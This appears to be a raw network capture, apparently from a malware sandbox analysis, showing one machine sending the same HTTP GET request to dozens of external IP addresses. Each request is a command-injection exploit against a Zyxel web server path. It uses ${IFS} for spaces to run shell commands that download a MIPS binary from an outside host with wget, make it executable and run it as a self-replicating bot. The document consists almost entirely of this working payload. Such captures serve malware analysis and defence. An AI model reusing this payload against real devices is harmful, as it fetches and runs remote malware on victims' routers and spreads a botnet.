                                      Jan 19, 2024 17:29:27.680201054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3278192.168.2.143901281.44.19.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680238962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3279192.168.2.1437566172.169.148.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680273056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3280192.168.2.144040238.217.46.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680310011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3281192.168.2.144207896.66.217.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680326939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3282192.168.2.1433072206.80.143.3443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680375099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3283192.168.2.144062418.177.219.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680427074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3284192.168.2.1446832136.215.25.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680455923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3285192.168.2.1438210117.241.3.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680531979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3286192.168.2.145676840.168.125.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680567026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3287192.168.2.143754213.55.194.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680607080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3288192.168.2.1434180189.141.142.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680636883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3289192.168.2.1442430169.127.172.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680666924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3290192.168.2.145745414.104.15.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680691957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3291192.168.2.1446802103.111.216.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680740118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3292192.168.2.1448096200.55.212.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680788040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3293192.168.2.1435350175.160.144.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680805922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3294192.168.2.1455576165.151.111.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680866003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3295192.168.2.1446478221.147.27.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680887938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3296192.168.2.1450308117.77.81.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.680938959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3297192.168.2.1441274151.179.140.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681060076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3298192.168.2.1449464185.135.122.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681097031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3299192.168.2.1450668187.175.247.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681144953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3300192.168.2.1433294203.27.133.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681193113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3301192.168.2.145108614.136.154.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681224108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3302192.168.2.1435154208.40.79.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681272030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3303192.168.2.145724827.77.219.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681303978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3304192.168.2.1437354111.175.52.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681349993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3305192.168.2.1447036151.119.76.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681382895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3306192.168.2.1459214197.177.5.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681416988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3307192.168.2.144310263.198.178.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681444883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3308192.168.2.144748090.55.53.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681509018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3309192.168.2.143597892.37.250.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681550980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3310192.168.2.145453042.248.79.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681577921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3311192.168.2.14587322.213.71.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681618929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3312192.168.2.1447892159.49.157.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681675911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3313192.168.2.1455842203.39.35.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681699038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3314192.168.2.1432808172.65.227.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681736946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3315192.168.2.1460376149.152.96.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681794882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3316192.168.2.1450262124.55.119.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681813002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3317192.168.2.1434210124.65.142.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681865931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3318192.168.2.144981270.222.149.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681901932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3319192.168.2.145643437.62.246.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681927919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3320192.168.2.1452862138.184.138.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.681992054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3321192.168.2.143967285.162.228.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682040930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3322192.168.2.143704873.181.155.229443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682086945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3323192.168.2.145065673.161.128.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682112932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3324192.168.2.1439424145.250.144.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682169914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3325192.168.2.1439102174.57.201.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682209969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3326192.168.2.143283281.93.244.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682240963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3327192.168.2.14546865.215.192.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682287931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3328192.168.2.1459154128.251.15.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682346106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3329192.168.2.144778293.238.37.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682391882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3330192.168.2.1435526111.145.133.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682427883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3331192.168.2.1450814143.118.28.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682460070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3332192.168.2.1457278186.171.191.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682511091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3333192.168.2.144816688.130.164.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682549000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3334192.168.2.144713482.132.127.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682579041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3335192.168.2.144709014.13.28.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682625055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3336192.168.2.144381445.7.18.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682670116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3337192.168.2.1442788147.222.112.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682703972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3338192.168.2.1449510200.202.110.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682730913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3339192.168.2.1441764136.247.89.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682776928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3340192.168.2.1436734191.129.74.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:27.682832003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3341192.168.2.1459900113.136.67.229443
                                      TimestampBytes transferredDirectionData
